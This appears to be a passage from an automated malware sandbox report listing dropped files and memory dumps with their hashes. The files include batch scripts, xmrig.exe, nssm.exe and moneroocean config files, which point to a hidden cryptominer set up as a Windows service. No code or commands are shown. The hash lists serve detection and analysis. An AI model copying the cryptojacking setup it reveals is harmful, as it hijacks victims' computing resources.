356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\script_5472b326.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7223.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
65af2c948d2b89c9a105d1fb0b467885

SHA1
1344cc7d00abe84bdbd9f35c7ce4a665e7e45773

SHA256
90f5d28d166590d5854231b924a0115ccc1ebc6c2ae56e14b787b05e83c78e4a

SHA512
37536a9629a61a83cd31f22cfb63d381bc2b13bf4bbc84f40d475b14e7e80df11434697e5b57814fccfcc04be31937aab84de5260af6321111904dfd200a92a6

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
232247e04b3f29d89bddbef4ebf1fab1

SHA1
efbe39231130499fc4764e286c5dc556a918fdab

SHA256
c030bd919756e0746997327d3828dbdee61571a1501dccff18d8bcd76d62d797

SHA512
8019bc18074f67c10319cca0cca9fcf27c53483e0b09600b3182243350ae1efdd5b7503e4a28ecbe4ea8cfe788e8f6e90da5698bb1dfddcd5e1d2e61564ca1f1

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
2589fddda172b2ac8ae08f6c82d53a45

SHA1
d71c7915116fbecf811b05385aedc12453d53d31

SHA256
e2ffa3fc87885c6b119ae6c92ce48789707c3de698e0dddd5687f3e1113740a2

SHA512
50629354e805c09380ff477f2b415641bd5718006b129cbe024f297305bc2bd3a14f4afe4574c178927bc7fda91792f4e57a8bdd76f85b7ae8cc47166f6e2642

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1856-138-0x000001FE43ED0000-0x000001FE43EE2000-memory.dmp

Filesize
72KB

Download
memory/1856-137-0x000001FE43EA0000-0x000001FE43EAA000-memory.dmp

Filesize
40KB

Download
memory/3236-25-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/3236-10-0x00000257C4B90000-0x00000257C4C06000-memory.dmp

Filesize
472KB

Download
memory/3236-5-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/3236-6-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/3236-7-0x00000257C4880000-0x00000257C48A2000-memory.dmp

Filesize
136KB

Download
memory/3236-2-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/3236-51-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/3720-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3720-180-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/3792-467-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-486-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-515-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-514-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-463-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-464-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-465-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-466-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-513-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-468-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-469-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-470-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-512-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-472-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-473-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-474-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-475-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-476-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-477-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-478-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-479-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-480-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-481-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-482-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-483-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-484-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-485-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-511-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-487-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-488-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-489-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-490-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-491-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-492-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-493-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-494-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-495-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-496-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-497-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-499-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-500-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-501-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-502-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-503-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-504-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-505-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-506-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-507-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-508-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-509-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3792-510-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4100-471-0x0000022EA9CA0000-0x0000022EA9D41000-memory.dmp

Filesize
644KB

Download
memory/4476-60-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/4476-57-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/4476-462-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download
memory/4476-59-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

Filesize
1.9MB

Download